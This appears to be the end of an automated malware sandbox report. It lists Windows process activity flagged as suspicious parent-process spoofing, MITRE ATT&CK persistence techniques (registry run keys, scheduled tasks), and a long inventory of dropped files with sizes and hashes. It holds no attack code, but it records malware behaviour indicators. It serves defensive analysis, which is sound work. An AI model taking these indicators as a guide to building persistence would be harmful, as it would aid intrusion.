C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 5892 -ip 58922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 5296 -ip 52962⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 5516 -ip 55162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD54e494127b83c60277acebc398c6f4f04
SHA14514989e840356f2f008cf15624bc6283afe1fe6
SHA256af1e92ce3f7d31ec050766d32500e572776a0373f632668ef86b9dfc3c085aac
SHA51207f1dca248aa9368aa90ec16c786bea9c566cc741ee286fa9a5317eab1f3f1e02de5c2c847d9c65a20a34a11a9f03680394338ec36b6025f2fd1f419773d7e0f
-
Filesize
13KB
MD51740e6a2b459f12666fbcd2421d70be7
SHA113bf6a113bab328b0a245fd998bee3983478f0af
SHA2564a769f1b2912782fd2987cd359932259983328239cea2f2333f36b560e569642
SHA512af0cdb739bd64784f079e29f84e060894b9b4d037f2009555687c4204edc0b5f68254a2b292f3f8cb2090ef72bbf202b754f2cfdbfff37f5b94c17793a79e26d
-
Filesize
41KB
MD5e7acd7b6ff9e68124e20da94245bdc26
SHA167462259128d031097bd7615639e7aeb8aa0073f
SHA2564fe3c8814fe6aea42ea6d50b3ff704fe797e702e4627f3d696aa71ae90a4b191
SHA512cb3ff4c5053fc4fc4352470722e113b37745e0995e4dc7a8e10c3ece6e2d7c6cbf905c5dbf0a0c608d2e2a6dd01d8a8dc10f6fd1b08ca174af3fab155587ca25
-
Filesize
13KB
MD5cbb651b7b85a9ab89d2e9167b18d45c0
SHA13043088e9f6718b4cea26a24a632844faec1fa95
SHA256de8862f097856f540bbc5969a27f6448995eca49b56ed1a01bead7cc5039a154
SHA51201f44d0579b9ea10a67fd50b2393a49bfa6fd914d0b500c482fe71999843a3b37a4623796235d19a8f0729bc9690900276614dea5d9199ef4ac77df6efe4473f
-
Filesize
1KB
MD57ca69c3a50dd1e107b36424371d545aa
SHA1af96b7133f339588b8de9e29be762dd8fbe2da08
SHA256fb56bfa6682034270cd833c70e9ab03a606372aef15b2e305da0318873394664
SHA512bf3b5a590335e671cd44f244bf20fc30028a56c55f69f4f8b0a46aba787b248c343391998ed5267b5ca9aa0075697e169056120c18837ddc3ca97c5ace83c6fd
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
330B
MD5204b57966283508ddca422e2d381ff46
SHA172924a1c7cc817de710b58bc6b36dc9928f5f868
SHA2560d794bcaa25c369b63fe596c7176fb23d38c1b7dfbb4ba574f813a9b84e8bb54
SHA512e542eead0b524504f67f92e321ab74456235631e830e6e9c7ee195ce01505293dc519c2c5c67a23e540a27508bc858d54fe8f60a3a603ba186132cf477b56e58
-
Filesize
330B
MD5d312ba31b303b0992cdbe97e5b160978
SHA12a374f2525042f838e1d05ae4a06f0407b905277
SHA256d2cd42a47bec469e6ccd1d75ecebf368a6e78165f61131b8537bb5f45121e0b5
SHA5121f9cc356f5630500c9a7e9e387a7499f49f736187d0b2f67b5f3cdba2164cdb23e60efaac0a7b37c2b20e3e37a72d76ccd0637abfd07f318ba3aebcdb8524dd2
-
Filesize
35KB
MD52e64684f1ebd5e1823b0b67c92408917
SHA185c9d45454933b0bd920902a0a6b0ecbfcefdfec
SHA2560d22c16818036d312d538977d530ff2b2ec3373f2d021613566c566f9367bcef
SHA512da36d7f3ca4ccdbf4a66492107faee2e3d63b286591be5bf3046f281bc8ed48bb3bbd481c2f41c33edd81c28c6b86339be418cee93a877be6bd1c2afc8951db2
-
Filesize
64KB
MD5b737ebe6ca6354a1b8951dfb3f995bd7
SHA1f1c845bfa2d95227c7383cf4bd895a4bdc06ba9a
SHA25631ffb19997624fa3bfc071d61a2c4713bd6d52636ab2aee3d1ce185e294ce859
SHA5126a713b7e12d5b985fedc03e7edc8cd17fd14cb0eeec340c98367f361790ee826234f291ac9f6fdce2df13c63cc362dc23ebc6147de11d9515751f340e22143ac
-
Filesize
76KB
MD50ee5c134de6df52fdda8b3be2e3198ba
SHA150a67723030e2e2c653cc659db49ab3e7170c692
SHA256ee475b056cb651e58bba55568e07caf8d26fb38c3ed7e0399e4188febe127825
SHA512405b6b8217f61806caa7c4c41e5bcbfa32c781d99c493d27ef22c26c0140ff9f2fb95ad5ce8465f31a3f4c3fbc6a2dcf4372a1a15766e95be15c139ad6dc0dfe
-
Filesize
317KB
MD55330f2ca77ea587a1a3d14da9a623498
SHA1ae469532f64a2c4d9347e1879b6599cdb487248d
SHA25616e2c2c38922ada41528faf33db72027b1fdddf696d901ff9bf7cc443ec5c9ca
SHA512bbfc4c84e4b26f36419357b8ab53ea124c0715de36bde9efca0c755ac0ad6c0ef6ad13e9606f74a346798364704d7f01c51f7bed114ee12ad1f0de180fe45bdb
-
Filesize
8KB
MD5ef7a000bee8770cd0d2b480632421458
SHA165683ecb8208f64520c9c8c19418d8fb95abcd35
SHA2566485ea559bdbbff1fd5386644ea4f7ea6e9afbcbb1028d13d8f2ebbf216857da
SHA512e3c6adda760d8fef58bbe3f459397244f801b240a71c6c2223aa08876dcfcf5fa994aa3bbacbbf1d6eebd761b75833a8e7d45812322fa28b364dab12c1b0b02d
-
Filesize
10KB
MD5abda48204fcff3e06637a4fe8d169b6f
SHA1fd792beced0977aa9095d66410803bb1758ff5af
SHA2568eb0b160f927ef53bcd050d54066a9a9e50ab4006af674d89a94d994b9c09451
SHA51231f556842ddace8c89e852e05cc9d54ed33a28cc7237ac22f6c25fc2c77e16fdb51be63bb9552f8696e54f54f55d47988cc2a59fd3db796e2ecc3fd82dacec04
-
Filesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
Filesize
651KB
MD5960493ad61c6f54b945bf598b6c6bb65
SHA17baffaab2b8796b2e488b15af0c1b562a300c008
SHA256b86d3f555ab666ad7db168a1d4ae14c653d14b9c369d622e0643383630722b6c
SHA5122e30b29902ebedd1dc59617ea476abb04e7c39cbd9f996402a5c35e9496c0432681a75f64fc1c90f8c862cd7437de16a763ff7472f4412f455ad3ca495462a1c
-
Filesize
145KB
MD59fc46e9e9259dd82c72f0c01adab7e87
SHA1c6d3fcd895aa332cf266f967940379ded55ad441
SHA2561b485ebeb910f35ddb8db2a1225b4049fcf8281404cc39e532148cf7b654d589
SHA5121322695b117f76e0c29cdc54015ec43fdcce6b9294a42fca42db5226ade28be03dfee8afe4818631c60c568a8ecf25715e3846236c3c9a790aaa9b80243aaa76
-
Filesize
109KB
MD538fc10fa0e887853119850c77e6067d5
SHA15bca8e114613dd3e08c54362ac433fe9f06fa2c0
SHA256e3450f2a89811cfa81450222ecf1b632ffb339fa4f8b80a147a24969ba45cc65
SHA512c53f69f7e21118bd7beb2688a87e350133985f2cbb24fbd3a8cc5bcd82575c87cc3278a48d8a0e6e80170ba75580e62cd154b84d830152ee7ba88144fb0b1c64
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
1KB
MD566898dbf1d1f32af63256328731f2c9e
SHA121f5828b21fae6d81e57a11e113440c95e1752de
SHA256258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90
SHA51265ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94
-
Filesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
Filesize
1KB
MD502a1a26525c65a359d41483180eaa6f7
SHA1c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2
-
Filesize
1KB
MD58b591dabf3d165412ca5160b0fc9f7a0
SHA17f4003f64d280a98099a799b7303ab94adfea747
SHA256d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60
SHA51257aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5
-
Filesize
1KB
MD536fea3c7bd7bf5f15ee1a748daae1f24
SHA1c5e0122744a61d18b64126bf35374e29ecfe7553
SHA256bec6c6166fb67f7866ad5dad460b9212b3fe6a2f909638ec9abe465c6199ade4
SHA5126ded68570e0234e985f5a58307e25f94e9980de39d306e16ab02d89f67b701c129ac740f48bc7f22a5befe78cbfe56bd76a31a12d17ffc973be1a8a3079de4c1
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
40KB
-
Filesize
88KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
148KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
136KB
-
Filesize
168KB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
4.6MB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
32KB
-
Filesize
760KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
64KB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
520KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
688KB
-
Filesize
4.6MB